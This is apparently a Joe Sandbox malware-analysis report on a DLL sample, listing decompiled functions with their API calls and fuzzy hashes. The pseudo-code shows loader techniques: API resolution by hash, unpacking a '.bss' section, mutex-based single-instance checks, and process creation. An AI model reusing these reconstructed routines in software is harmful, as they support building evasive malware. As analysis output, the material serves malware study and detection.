Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateDirectoryHandleInitQueryStringUnicode
String ID:
API String ID: 2375947951-0
Opcode ID: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
Instruction ID: 86e8c0801eecd6214d3de86c7c9a3f36e2355b629a028b10123d7888b335a31b
Opcode Fuzzy Hash: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
Instruction Fuzzy Hash: A5319E72214B8486D7A1CF15E45439E77A1F78CBD4F588626EAAD43B88DF38CA48CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006754 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81
processmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0000000180006786

Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D

CreateProcessW.KERNELBASE ref: 00000001800067F7
WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
TerminateProcess.KERNEL32 ref: 0000000180006844
CloseHandle.KERNEL32 ref: 000000018000684F
CloseHandle.KERNEL32 ref: 000000018000685A
GetLastError.KERNEL32 ref: 0000000180006862
HeapFree.KERNEL32 ref: 0000000180006877

Strings

h, xrefs: 00000001800067A1

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: CloseHandleHeapProcess$AllocCreateErrorFreeLastMultipleObjectsTerminateWaitmemset
String ID: h
API String ID: 3316326719-2439710439
Opcode ID: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
Instruction ID: 097b2738b8004f5ee40f8b7a1758c839ecbf0a38091e65ea8e5fbb9dadc2f9be
Opcode Fuzzy Hash: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
Instruction Fuzzy Hash: CF318E32704B8986EB95CB56E84479AB3A1F78CBD0F14C135EA9D83B64DF78C548CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004F1C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00000001180004F1C(long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t46;
				long long _t56;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr* _t76;
				long long _t80;
				long long _t82;
				void* _t83;
				long long _t85;
				void* _t91;
				void* _t92;
				long _t93;
				long _t95;
				long _t97;

				_t92 = __r11;
				_t56 = _t85;
				 *((long long*)(_t56 + 8)) = __rbx;
				 *((long long*)(_t56 + 0x10)) = _t82;
				 *((long long*)(_t56 + 0x18)) = __rsi;
				 *((long long*)(_t56 + 0x20)) = __rdi;
				_t83 = __rcx;
				r8d = 0;
				HeapCreate(_t97, _t95, _t93); // executed
				_t80 = _t56;
				if (_t56 == 0) goto 0x8000506b;
				_t72 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
				_t75 = _t56 + _t72 + 0x68;
				_t22 =  *_t75;
				if (_t22 == 0) goto 0x80004ffc;
				if (_t22 == 0x7373622e) goto 0x80004f8a;
				_t76 = _t75 + 0x28;
				_t23 =  *_t76;
				if (_t23 != 0) goto 0x80004f79;
				if (_t23 == 0) goto 0x80004ffc;
				r13d =  *(_t76 + 0x10);
				r12d =  *(_t76 + 0x14);
				r12d = r12d ^  *(_t72 + 8);
				r12d = r12d ^ r13d;
				HeapAlloc(??, ??, ??);
				if (_t56 == 0) goto 0x80004ff5;
				r9d = r12d;
				r8d = r13d;
				E00000001180002524(_t56, __rbx, _t56, _t72 + __rcx, _t80);
				r11d =  *((intOrPtr*)(_t76 + 0xc));
				 *0x8000d490 = _t56 - _t92 - _t83;
				 *0x8000d498 = E00000001180001B48(_t56, _t56 - _t92 - _t83 + 0x80011040);
				goto 0x80005001;
				goto 0x80005001;
				if (2 == 0) goto 0x80005010;
				HeapDestroy(??);
				goto 0x8000506b;
				HeapAlloc(??, ??, ??);
				if (0x80011040 != 0) goto 0x80005049;
				HeapDestroy(??);
				goto 0x8000506b;
				0x8000236a();
				 *0x180011048 = _t80;
				 *0x8000d4a0 = 0x80011040;
				return E0000000118000508C(0, _t46, 0x80011040, 0x80011040, _t83, _t91);
			}

APIs

HeapCreate.KERNELBASE(?,?,?,000000018000134F), ref: 0000000180004F4B
HeapAlloc.KERNEL32(?,?,?,000000018000134F), ref: 0000000180004FA5
HeapDestroy.KERNEL32(?,?,?,000000018000134F), ref: 0000000180005008
HeapAlloc.KERNEL32(?,?,?,000000018000134F), ref: 000000018000502B
HeapDestroy.KERNEL32(?,?,?,000000018000134F), ref: 000000018000503C

Strings

.bss, xrefs: 0000000180004F79

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$AllocDestroy$Create
String ID: .bss
API String ID: 388876957-3890483948
Opcode ID: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
Instruction ID: 17f0f38e5d9243197e023c83d38f09e6848a0c07c4c3a118f17cd0d0cedb6ef9
Opcode Fuzzy Hash: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
Instruction Fuzzy Hash: 68418B72300B4986FB96CB56A8543AA73A0FB4CFD4F04C025EE494BB81DF38DA998710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001000 Relevance: 10.6, APIs: 7, Instructions: 79
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 000000018000104A
GetFileSize.KERNEL32 ref: 000000018000105E
HeapAlloc.KERNEL32 ref: 000000018000107A
ReadFile.KERNELBASE ref: 000000018000109F
GetLastError.KERNEL32 ref: 00000001800010C8
CloseHandle.KERNEL32 ref: 00000001800010D9
HeapFree.KERNEL32 ref: 00000001800010F0

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: File$Heap$AllocCloseCreateErrorFreeHandleLastReadSize
String ID:
API String ID: 4260168601-0
Opcode ID: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
Instruction ID: dbc3ca4fbdf92ddb3d6ab0fb3fd3743db26333d8f93616b96f69221312f2bdc0
Opcode Fuzzy Hash: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
Instruction Fuzzy Hash: 3431413120478986F7A2CB56A8447DAB6D0B74CBE5F44C325EEA9477D4DF78C68E8B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002668 Relevance: 10.6, APIs: 7, Instructions: 76
memorystringthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?,?,?,?,00000001,00000001800058DA,?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000269E
HeapAlloc.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026B0
lstrcpyA.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026DB
CreateThread.KERNELBASE(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002715
FindCloseChangeNotification.KERNELBASE(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002724
GetLastError.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000272C
HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002741

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$AllocChangeCloseCreateErrorFindFreeLastNotificationThreadlstrcpylstrlen
String ID:
API String ID: 855867372-0
Opcode ID: 8f83108d9fd5bf52bbc778f18ae66d6137a75de2933ab538b9230eaa7567e890
Instruction ID: 8ed8152a395896e124fdee7dd42a1db6533dceb9cab86c829ebc78b2e775e80d
Opcode Fuzzy Hash: 8f83108d9fd5bf52bbc778f18ae66d6137a75de2933ab538b9230eaa7567e890
Instruction Fuzzy Hash: 8221AD36604788C6E7A6DF52B84039AB7A0B78CBE0F48C425FE9A47764CF38D649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008708 Relevance: 6.1, APIs: 4, Instructions: 70
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00000001180008708(void* __eax, void* __edi, long long __rbx, intOrPtr* __rcx, void* __rdx, void* _a8, char _a16, long long _a24) {
				void* _v72;
				long long _v88;
				void* __rsi;
				void* __rbp;
				void* _t45;
				long long _t46;
				long long _t47;
				struct _SECURITY_ATTRIBUTES* _t57;
				long long _t60;
				int _t62;
				WCHAR* _t66;
				void* _t69;
				void* _t76;
				void* _t79;

				_t47 = __rbx;
				_t45 = _t69;
				 *((long long*)(_t45 + 8)) = __rbx;
				r9d = 0;
				 *((intOrPtr*)(_t45 - 0x48)) = 0x18;
				 *((intOrPtr*)(_t45 - 0x38)) = 0;
				0x800085dc(); // executed
				if (__eax == 0) goto 0x800087f7;
				_a16 =  *__rcx;
				_t46 =  &_a24;
				r9d = 0;
				_v88 = _t46;
				E000000011800030C8(__edi, __rbx,  &_a16,  *0x8000d490, __rcx,  *0x8000d490 + 0x180011188, _t79, _t76);
				if (_t46 == _t47) goto 0x800087f7;
				E0000000118000459C(0x3ff22481, _t46,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t46 == _t47) goto 0x800087c0;
				CreateMutexW(_t57, _t62, _t66); // executed
				goto 0x800087c3;
				_t60 = _t47;
				if (_t60 == _t47) goto 0x800087e9;
				if (GetLastError() != 0xb7) goto 0x800087e0;
				CloseHandle(??);
				goto 0x800087e9;
				_a24 = _t60;
				HeapFree(??, ??, ??);
				return 1;
			}

APIs

Part of subcall function 00000001800030C8: lstrlenW.KERNEL32(?,?,?,0000000180008793), ref: 000000018000310D
Part of subcall function 00000001800030C8: HeapAlloc.KERNEL32(?,?,?,0000000180008793), ref: 0000000180003126
Part of subcall function 00000001800030C8: memcpy.NTDLL ref: 000000018000314B
Part of subcall function 00000001800030C8: memcpy.NTDLL ref: 000000018000317D

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

CreateMutexW.KERNELBASE ref: 00000001800087B9
GetLastError.KERNEL32 ref: 00000001800087C8
CloseHandle.KERNEL32 ref: 00000001800087D8
HeapFree.KERNEL32 ref: 00000001800087F1

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorHeapLastmemcpy$AllocCloseCreateFreeHandleMutexlstrlen
String ID:
API String ID: 3861850634-0
Opcode ID: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
Instruction ID: 127f5c0fcc647b7374bd47b38eb5124d32550bc361860966e3f5016e667268f0
Opcode Fuzzy Hash: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
Instruction Fuzzy Hash: B621593220468996EBA1CF52E8407D977A1FB8CBC8F588426EF4D47B49DE34D64EC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006008 Relevance: 6.1, APIs: 4, Instructions: 68
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?,?,00000000,0000000180006189), ref: 0000000180006042
RtlAllocateHeap.NTDLL ref: 0000000180006057
_snprintf.NTDLL ref: 00000001800060B9
lstrcpyA.KERNEL32 ref: 00000001800060DD

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_snprintflstrcpylstrlen
String ID:
API String ID: 2809993405-0
Opcode ID: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
Instruction ID: cd8941c1faf9c1b72c5725e61722f5b4f1580fba6f0a1dbc367b270ebdb23bd2
Opcode Fuzzy Hash: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
Instruction Fuzzy Hash: 83316B36604B888BD7A5CF16E454B9AB7A5F38CBC4F048126EE9E83714DF39D545CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007B94 Relevance: 4.6, APIs: 3, Instructions: 131
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: AllocateHeapmemset
String ID:
API String ID: 669713250-0
Opcode ID: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
Instruction ID: b8eae849a3001c6edc556b20ee36b044cea257758f74ce9d79c82757b9587b00
Opcode Fuzzy Hash: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
Instruction Fuzzy Hash: 7F518C72B04B8486E7A6CB05E444B9AB7B1FB98BD4F508116EE8D43B54DF38C9A5CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000702C Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E0000000118000702C(void* __ebx, long long* __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16, void* _a24) {
				intOrPtr _v24;
				long long* _t42;

				_t42 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_t53 =  *0x8000d4a0;
				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t42 == 0) goto 0x80007074;
				r9d = 1;
				r8d = 0;
				_v24 = 0xf0000040;
				 *_t42(); // executed
				goto 0x80007076;
				if (0 == 0) goto 0x800070ce;
				E0000000118000459C(0xc506923c, _t42,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t42 == 0) goto 0x8000709e;
				 *_t42();
				goto 0x800070a0;
				if (0 == 0) goto 0x800070a8;
				goto 0x800070b0;
				GetLastError();
				E0000000118000459C(0xbaca8f4d, _t42,  *((intOrPtr*)(_t53 + 0x20)));
				if (_t42 == 0) goto 0x800070d6;
				 *_t42();
				goto 0x800070d6;
				if (GetLastError() == 0) goto 0x800070e9;
				return E00000001180004CFC(4, __rbx, __rcx);
			}

0x18000702c
0x18000702c
0x180007031
0x18000703b
0x18000704e
0x180007056
0x18000705d
0x180007063
0x180007068
0x180007070
0x180007072
0x180007078
0x180007083
0x18000708b
0x18000709a
0x18000709c
0x1800070a2
0x1800070a6
0x1800070a8
0x1800070b9
0x1800070c1
0x1800070ca
0x1800070cc
0x1800070d8
0x1800070fa

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

GetLastError.KERNEL32(00000000,0000000180006AC3), ref: 00000001800070A8
GetLastError.KERNEL32(00000000,0000000180006AC3), ref: 00000001800070CE

Strings

@, xrefs: 0000000180007068

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID: @
API String ID: 1452528299-2766056989
Opcode ID: 3d7c3c247832b170b47bab491a8084ec548c7f0c1147f1404c92e67fe32440c0
Instruction ID: ac7bd9da6f2b9285d8b03cb53e6a872d64b1fe26a18dfc81d45ef4acb4719aca
Opcode Fuzzy Hash: 3d7c3c247832b170b47bab491a8084ec548c7f0c1147f1404c92e67fe32440c0
Instruction Fuzzy Hash: FD214D71704B5982FAA2D7A5A4403AA7290ABDC7C0F14C621AE4D87B8ADE6CCA098715

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002464 Relevance: 4.5, APIs: 3, Instructions: 30
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00000001180002464(void* __rax, long long __rbx, long long* __rdx, long long __rsi, long long _a8, long long _a16, void* _a24) {
				long long _t20;
				void* _t24;
				void* _t31;
				void* _t32;

				_a8 = __rbx;
				_a16 = __rsi;
				LoadLibraryA(??); // executed
				_t24 = __rax;
				if (__rax == 0) goto 0x800024af;
				if (E00000001180007B94(__rax,  &_a24, _t31, _t32) != 0) goto 0x800024a4;
				_t20 = _a24;
				 *_t20 = _t24;
				 *__rdx = _t20;
				goto 0x800024b7;
				FreeLibrary(??);
				goto 0x800024b7;
				return GetLastError();
			}

0x180002464
0x180002469
0x180002476
0x18000247c
0x180002482
0x180002495
0x180002497
0x18000249c
0x18000249f
0x1800024a2
0x1800024a7
0x1800024ad
0x1800024c8

APIs

LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
GetLastError.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024AF

Part of subcall function 0000000180007B94: RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
Part of subcall function 0000000180007B94: memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35

FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Library$AllocateErrorFreeHeapLastLoadmemset
String ID:
API String ID: 105124555-0
Opcode ID: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
Instruction ID: 15b41fa467f29f274ac49399cf4168cd092f7d47ffdb68e5546afb005077a2c4
Opcode Fuzzy Hash: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
Instruction Fuzzy Hash: 6EF01231705B8982EB96CB55B5543A973A4BB9CBD0F54C020FB5943B49EF38C559C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003798 Relevance: 3.9, APIs: 3, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00000001180003798(signed int __ecx, long long* __rax, long long __rbx, intOrPtr* __rcx, signed int __rdx, void* __r8) {
				signed int _t45;
				intOrPtr _t52;
				void* _t65;
				long long* _t68;
				signed long long _t72;
				void* _t85;
				void* _t87;
				long long _t89;
				void* _t92;
				void* _t93;
				void* _t99;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t108;

				_t68 = __rax;
				_t45 = __ecx;
				_t99 = _t92;
				 *((long long*)(_t99 + 0x10)) = __rbx;
				 *((long long*)(_t99 + 0x18)) = _t89;
				_t93 = _t92 - 0x40;
				_t52 = r9d;
				_t26 =  <  ? r9d : 0x1000;
				_t103 = __r8;
				 *((intOrPtr*)(_t99 + 0x20)) =  <  ? r9d : 0x1000;
				E0000000118000459C(0xdc630174, __rax,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t68 == 0) goto 0x8000381d;
				asm("sbb ecx, ecx");
				_t72 =  ~__rdx;
				asm("inc ebp");
				 *(_t93 + 0x30) =  *(_t93 + 0x30) & 0x00000000;
				 *((intOrPtr*)(_t93 + 0x28)) = _t52;
				 *(_t93 + 0x20) = _t45 &  *(_t93 + 0x88);
				 *_t68(_t108, _t105, _t102, _t85, _t87); // executed
				goto 0x8000381f;
				if (0 != 0) goto 0x80003890;
				if (GetLastError() != 0x2f8f) goto 0x80003876;
				 *((intOrPtr*)(_t93 + 0x70)) = 0x3300;
				if (0 != 0) goto 0x800038dc;
				E0000000118000459C(0xe7f09937, _t72,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t72 == 0) goto 0x80003869;
				_t14 = _t87 + 4; // 0x4
				r9d = _t14;
				 *_t72();
				goto 0x8000386b;
				if (0 == 0) goto 0x80003884;
				goto 0x8000387d;
				if (0 != 0x2f00) goto 0x8000388c;
				goto 0x800037d2;
				if (GetLastError() != 0) goto 0x800038dc;
				_t65 = _t103;
				if (_t65 == 0) goto 0x800038dc;
				if (_t65 == 0) goto 0x800038dc;
				E0000000118000459C(0xcb679d89, _t72,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t72 == 0) goto 0x800038ce;
				r8d = _t52 -  *(_t93 + 0x88);
				 *_t72();
				goto 0x800038d0;
				if (0 != 0) goto 0x800038dc;
				return GetLastError();
			}

0x180003798
0x180003798
0x180003798
0x18000379b
0x18000379f
0x1800037ab
0x1800037be
0x1800037c1
0x1800037c5
0x1800037cb
0x1800037db
0x1800037e6
0x1800037f7
0x180003800
0x180003803
0x180003806
0x18000380c
0x180003810
0x180003818
0x18000381b
0x180003821
0x180003830
0x180003832
0x18000383c
0x18000384b
0x180003853
0x180003859
0x180003859
0x180003865
0x180003867
0x18000386d
0x180003874
0x18000387b
0x18000387f
0x18000388e
0x180003890
0x180003893
0x18000389c
0x1800038a7
0x1800038af
0x1800038c7
0x1800038ca
0x1800038cc
0x1800038d2
0x1800038f6

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

GetLastError.KERNEL32(00000000,000000018000553E,?,000000018000134F), ref: 0000000180003823
GetLastError.KERNEL32 ref: 0000000180003884
GetLastError.KERNEL32(00000000,000000018000553E,?,000000018000134F), ref: 00000001800038D4

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: f2c420c76b630dbde9be635b1a0a2799e127628071e741fee86cfc76d2d98ae6
Instruction ID: 751b5ccbb4ed30b18e4ca4c9a719b417d78c129dcd65879b60b3e8381e7608ce
Opcode Fuzzy Hash: f2c420c76b630dbde9be635b1a0a2799e127628071e741fee86cfc76d2d98ae6
Instruction Fuzzy Hash: 1C416E327047498AEBE3DB669841BEA73A8AB8C7D4F14C525FE4983785DE34CA4D8700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006DCC Relevance: 3.8, APIs: 3, Instructions: 62
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00000001180006DCC(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
				int _t27;
				void* _t46;
				long long _t48;
				intOrPtr* _t63;
				long long _t65;
				intOrPtr* _t66;
				void* _t68;
				void* _t69;
				void* _t71;
				void* _t74;
				WCHAR* _t77;
				WCHAR* _t80;

				_t48 = __rbx;
				_t46 = _t68;
				 *((long long*)(_t46 + 8)) = __rbx;
				 *((long long*)(_t46 + 0x10)) = _t65;
				 *((long long*)(_t46 + 0x18)) = __rsi;
				 *((long long*)(_t46 + 0x20)) = __rdi;
				_t69 = _t68 - 0x30;
				_t63 = __rcx;
				_t66 = __rdx;
				E000000011800089E4(__rbx,  *0x8000d490 + 0x180011220, __rdx, __rdi, __rcx, _t71);
				if ( *0x8000d4a0 == _t48) goto 0x80006e8a;
				 *_t66 =  *_t63;
				if (lstrlenW(_t80) - 0xe <= 0) goto 0x80006e4f;
				_t27 = lstrcmpiW(_t77); // executed
				if (_t27 == 0) goto 0x80006e7a;
				E00000001180002594(_t26, _t48,  *0x8000d4a0, _t63, _t69 + 0x20, _t74);
				r11d =  *((intOrPtr*)(_t69 + 0x20));
				 *_t66 =  *_t66 +  *((intOrPtr*)(_t69 + 0x24)) + r11d;
				 *((intOrPtr*)(_t66 + 4)) =  *((intOrPtr*)(_t66 + 4)) +  *((intOrPtr*)(_t69 + 0x28)) +  *((intOrPtr*)(_t69 + 0x2c));
				HeapFree(??, ??, ??);
				goto 0x80006e8f;
				return 8;
			}

APIs

Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D

lstrlenW.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E2B
lstrcmpiW.KERNELBASE(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E45
HeapFree.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E82

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

